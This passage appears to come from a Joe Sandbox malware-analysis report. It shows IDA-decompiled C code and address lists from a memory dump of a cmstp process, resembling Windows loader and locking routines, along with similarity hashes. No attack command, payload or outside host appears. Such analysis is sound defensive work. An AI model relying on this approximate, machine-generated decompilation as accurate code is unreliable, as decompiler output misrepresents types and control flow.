										L92:
										_t133 = E05106B90(_t210,  &_v64);
										_t262 =  *0x51c8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0510E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E051197C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0511006A(0x51c8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x51c8608);
												E0511B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x51c6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x51c6e48; // 0x33ab548
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E050EFFB0(_t198, _t240, 0x51c8608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E051100C2(0x51c8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x0
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x051020a0
0x051020a8
0x051020ad
0x051020b3
0x051020b8
0x051020c2
0x051020c7
0x051020cb
0x051020d2
0x05102263
0x05102266
0x05145836
0x05145836
0x00000000
0x0510226c
0x0510226c
0x05102270
0x05102274
0x051020e2
0x051020e2
0x051020e6
0x051020ee
0x051457dc
0x051457de
0x051457ec
0x051457ec
0x051457f1
0x051457f3
0x051457f8
0x00000000
0x051457f8
0x051457e0
0x051457e4
0x051457ea
0x00000000
0x00000000
0x00000000
0x051457ea
0x051020f4
0x051020f4
0x051020f8
0x051020f8
0x051020fc
0x05102100
0x05102106
0x05102201
0x05102206
0x0510220b
0x0510220e
0x051022a9
0x051022ac
0x00000000
0x00000000
0x051022b2
0x051022b5
0x05145801
0x05145806
0x00000000
0x00000000
0x05145810
0x05145815
0x05145818
0x00000000
0x00000000
0x0514581e
0x051022bb
0x051022bb
0x05102218
0x05102218
0x0510221c
0x05102220
0x05102222
0x051022c2
0x051022c4
0x051022dc
0x051022dc
0x051022e1
0x00000000
0x00000000
0x00000000
0x051022e7
0x051022c8
0x051022cd
0x051022d3
0x051022d6
0x05145823
0x05145825
0x05145827
0x00000000
0x00000000
0x0514582d
0x00000000
0x0514582d
0x00000000
0x05102228
0x05102228
0x00000000
0x05102228
0x05102222
0x05102214
0x05102214
0x00000000
0x05102114
0x05102114
0x05102114
0x0510211a
0x0510211c
0x05102348
0x0510234d
0x05145840
0x05145845
0x05145848
0x0514584e
0x0514584e
0x05145848
0x05102353
0x05102355
0x05102388
0x05102388
0x05102368
0x0510236a
0x0510236c
0x0510238f
0x00000000
0x0510236e
0x0510236e
0x0510218e
0x0510218e
0x05102191
0x05102195
0x05145a03
0x05145a06
0x05145a0c
0x05145a0f
0x05145a11
0x05145a13
0x05145a13
0x05145a19
0x05145a1f
0x00000000
0x0510219b
0x0510219b
0x051021a0
0x05102282
0x05102284
0x05102284
0x05102284
0x05102284
0x051021a6
0x051021a9
0x051021ac
0x051021ae
0x051021b3
0x0510228b
0x05102290
0x05102379
0x05102296
0x05102298
0x05102298
0x05102290
0x051021b9
0x051021be
0x051022a2
0x051022a2
0x051021c4
0x051021c8
0x051021cc
0x051021d0
0x051021d4
0x051021de
0x051021e3
0x05145a29
0x05145a2c
0x00000000
0x00000000
0x05145a3b
0x00000000
0x051021e9
0x051021e9
0x051021e9
0x051021ee
0x051021f1
0x05145a45
0x05145a4b
0x05145a52
0x05145a58
0x05145a5d
0x05145a5f
0x05145a71
0x05145a61
0x05145a6a
0x05145a6a
0x05145a76
0x05145a79
0x05145a7f
0x05145a83
0x05145a85
0x05145a87
0x05145a87
0x05145a8c
0x05145a91
0x05145a97
0x05145a9f
0x05145aa0
0x05145aa1
0x05145aa6
0x05145aab
0x05145ab1
0x05145ab3
0x05145ab9
0x05145aca
0x05145ad4
0x05145ad4
0x05145ade
0x05145ade
0x05145aab
0x05145a79
0x05145a52
0x051021f7
0x051021f9
0x051021fe
0x051021fe
0x051021e3
0x05102195
0x0510236c
0x05102122
0x05102122
0x05102124
0x05102231
0x05102236
0x05102236
0x05102238
0x05102238
0x05102240
0x05102242
0x05102244
0x051459fc
0x0510218c
0x0510218c
0x00000000
0x0510218c
0x0510224a
0x0510224f
0x05102256
0x05102304
0x05102309
0x0510230f
0x0510231e
0x0510231e
0x0510231e
0x05102320
0x05102325
0x0510232a
0x0510232c
0x0510233e
0x0510233e
0x00000000
0x0510232c
0x05102311
0x05102317
0x0510231a
0x0510231c
0x05102380
0x05102380
0x05102380
0x05102384
0x00000000
0x00000000
0x05102386
0x00000000
0x0510231c
0x0510225c
0x0510225c
0x00000000
0x0510225c
0x0510212a
0x05102134
0x05102138
0x0510213d
0x05145858
0x05145863
0x05145863
0x05145867
0x0514586a
0x00000000
0x00000000
0x0514586c
0x0514586c
0x05145871
0x05145875
0x05145877
0x05145997
0x0514599c
0x051459a1
0x051459a7
0x051459a7
0x00000000
0x051459a7
0x0514587d
0x00000000
0x0514588b
0x0514588b
0x05145890
0x05145892
0x05145894
0x05145899
0x0514589b
0x051458a0
0x051458a0
0x051458aa
0x051458b2
0x051458b6
0x051458be
0x051458c6
0x051458c9
0x0514590d
0x05145917
0x0514591a
0x0514591c
0x05145920
0x05145928
0x0514592a
0x0514592c
0x0514592e
0x0514592e
0x051458cb
0x051458cd
0x051458d8
0x051458e0
0x051458f4
0x051458fe
0x051458fe
0x0514593a
0x0514593e
0x05145940
0x05145942
0x00000000
0x05145944
0x05145944
0x05145949
0x0514594e
0x0514594e
0x05145953
0x0514595b
0x05145976
0x05145976
0x0514597a
0x0514597f
0x00000000
0x00000000
0x00000000
0x00000000
0x05145981
0x05145981
0x05145981
0x05145983
0x05145988
0x0514598d
0x05145991
0x05145991
0x00000000
0x0514595d
0x0514595d
0x05145963
0x05145965
0x00000000
0x00000000
0x00000000
0x00000000
0x05145967
0x05145967
0x0514596b
0x0514596d
0x00000000
0x00000000
0x0514596f
0x05145971
0x05145971
0x05145974
0x00000000
0x00000000
0x00000000
0x05145974
0x00000000
0x05145967
0x0514595b
0x05145942
0x05145863
0x05102143
0x05102143
0x05102149
0x0510214f
0x051022ec
0x051022f1
0x051022f6
0x00000000
0x051022f6
0x05102159
0x05102173
0x05102173
0x0510217d
0x05102181
0x05102186
0x051459ae
0x051459b2
0x051459b5
0x051459b7
0x051459ba
0x051459cd
0x051459d1
0x051459d5
0x051459d9
0x051459db
0x00000000
0x00000000
0x051459dd
0x051459dd
0x051459e1
0x051459e4
0x051459e7
0x051459ee
0x051459ee
0x051459f3
0x051459f3
0x00000000
0x05102186
0x05102164
0x0510216d
0x00000000
0x00000000
0x00000000
0x0510216d
0x05102106
0x05102266
0x051020d8
0x051020da
0x051020e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bb0b9db6b81901426d4d776c47f4c81d388c4cc2ab1583d6e14a1f602a2ce67
Instruction ID: a6bbd9f4f3f7e0cee1e5c5d023ca31849d4a0b33407177590e0fc7bdf824aae7
Opcode Fuzzy Hash: 2bb0b9db6b81901426d4d776c47f4c81d388c4cc2ab1583d6e14a1f602a2ce67
Instruction Fuzzy Hash: AFF103356083419FDB25CF28C848B6E7BE3BF85314F06A51DE8A69B2C0D7B5D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 050ED5E0 Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E050ED5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x51cd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E050E6600(0x51c52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x51c7b9c; // 0x0
							_t281 = L050F4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0511F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x51c7b90; // 0x77460000
								if(_t384 == 0) {
									_t353 =  *0x51c7b8c; // 0x33a29d8
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x33a2a88
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E050F2280(_t200, 0x51c84d8);
									_t277 =  *0x51c85f4; // 0x33a2ec8
									_t351 =  *0x51c85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x761a0000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x33a2f10
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x33a2e60
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x33a2f10
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x33a7240
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E050EFFB0(_t287, _t353, 0x51c84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0512CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E050E6600(0x51c52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E050E7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x51cb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0515E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x51c8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x51cb218; // 0x0
														asm("ror edi, cl");
														 *0x51cb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E050F2280(_t250, 0x51c84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L05113898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E050EFFB0(_t293, _t353, 0x51c84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E051137F5(_t353, 0);
																}
																E05110413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E05109B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E051002D6(_t174);
																}
																L050F77F0( *0x51c7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0510C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L050EEC7F(_t353);
										L051019B8(_t287, 0, _t353, 0);
										_t200 = E050DF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0511B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x51cb2f8; // 0x1250000
									if((_t206 |  *0x51cb2fc) == 0 || ( *0x51cb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x51cb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E05186B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E05186AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E050EE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L050EEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E05119730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E050EE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L050E8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E05113C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x050ed5f2
0x050ed5f5
0x050ed5f5
0x050ed5fd
0x050ed600
0x050ed60a
0x050ed60d
0x050ed617
0x050ed61d
0x050ed627
0x050ed62e
0x050ed911
0x050ed913
0x00000000
0x050ed919
0x050ed919
0x050ed919
0x050ed634
0x050ed634
0x050ed634
0x050ed634
0x050ed640
0x050ed8bf
0x00000000
0x050ed646
0x050ed646
0x050ed64d
0x050ed652
0x0513b2fc
0x0513b2fc
0x0513b302
0x0513b33b
0x0513b341
0x00000000
0x0513b304
0x0513b304
0x0513b319
0x0513b31e
0x0513b324
0x0513b326
0x0513b332
0x0513b347
0x0513b34c
0x0513b351
0x0513b35a
0x00000000
0x0513b328
0x0513b328
0x00000000
0x0513b328
0x0513b326
0x050ed658
0x050ed658
0x050ed65b
0x050ed665
0x00000000
0x050ed66b
0x050ed66b
0x050ed66b
0x050ed66b
0x050ed66d
0x050ed672
0x050ed67a
0x00000000
0x00000000
0x050ed680
0x050ed686
0x050ed8ce
0x050ed8d4
0x050ed8da
0x050ed8dd
0x050ed8dd
0x050ed8e0
0x050ed68c
0x050ed691
0x050ed69d
0x050ed6a2
0x050ed6a7
0x050ed6b0
0x050ed6b0
0x050ed6b5
0x050ed6e0
0x050ed6b7
0x050ed6b7
0x050ed6b9
0x050ed6b9
0x050ed6bb
0x050ed6bd
0x050ed6ce
0x050ed6d0
0x050ed6d2
0x0513b363
0x0513b365
0x00000000
0x0513b36b
0x00000000
0x0513b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x050ed6bf
0x050ed6bf
0x050ed6e5
0x050ed6e7
0x050ed6e9
0x050ed6e9
0x050ed6ec
0x050ed6ec
0x050ed6ef
0x050ed6f5
0x050ed6f9
0x050ed6fb
0x050ed6fd
0x050ed701
0x050ed703
0x050ed70a
0x050ed70a
0x050ed70a
0x050ed701
0x050ed70d
0x050ed710
0x050ed710
0x050ed6c1
0x050ed6c1
0x050ed6c1
0x050ed6c6
0x0513b36d
0x0513b36f
0x00000000
0x0513b375
0x0513b375
0x0513b375
0x00000000
0x0513b375
0x00000000
0x050ed6cc
0x050ed6d8
0x050ed6d8
0x050ed6d8
0x00000000
0x050ed6c6
0x050ed6bf
0x00000000
0x050ed6da
0x050ed6da
0x050ed716
0x050ed71b
0x050ed720
0x050ed726
0x050ed726
0x050ed72d
0x00000000
0x050ed733
0x050ed739
0x050ed742
0x050ed750
0x050ed758
0x050ed764
0x050ed776
0x050ed77a
0x050ed783
0x050ed928
0x050ed92c
0x050ed93d
0x050ed944
0x050ed94f
0x050ed954
0x050ed956
0x050ed95f
0x050ed961
0x050ed973
0x050ed973
